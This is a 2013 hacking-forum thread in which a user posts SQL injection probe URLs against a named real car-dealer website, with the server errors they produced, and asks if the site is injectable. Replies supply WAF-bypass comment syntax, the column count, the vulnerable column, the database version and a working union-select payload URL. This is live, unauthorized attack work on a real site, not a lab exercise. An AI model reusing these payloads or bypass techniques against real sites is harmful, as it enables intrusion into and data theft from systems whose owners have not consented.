Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
can't find Column number
Posted by: a_tek7
Date: June 05, 2013 11:30AM

I'm newbie.

http://www.aristocars.com.pk/Car.php?id=250+and 1=0
forbidden
http://www.aristocars.com.pk/Car.php?id=250+and+a=b
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/aristoca/public_html/Car.php on line 38

http://www.aristocars.com.pk/Car.php?id=250+order+by+3
ok
http://www.aristocars.com.pk/Car.php?id=250+order+by+4

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/aristoca/public_html/Car.php on line 72

http://www.aristocars.com.pk/Car.php?id=250+union(select 1,2,3)--
forbidden
http://www.aristocars.com.pk/Car.php?id=250+uNioN(SSseLeCCCCct+1,2,3)--

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/aristoca/public_html/Car.php on line 38

is this vulnerable to SQLi?

Options: ReplyQuote
Re: can't find Column number
Posted by: ajkaro
Date: June 05, 2013 12:49PM

Use /*!50000union*/ /*!50000select*/

There are 3 columns, vulnerable is column #3 hidden in <img> tag

version: 5.5.23-55

Options: ReplyQuote
Re: can't find Column number
Posted by: hack2012
Date: June 05, 2013 10:46PM

http://www.aristocars.com.pk/Car.php?id=-250 /*!12346UnioN*/ all select 1,2,@@version

For more Waf bypass Please visit my BLog:

http://www.waitalone.cn/tag/bypass

I am from China !

Options: ReplyQuote


Sorry, only registered users may post in this forum.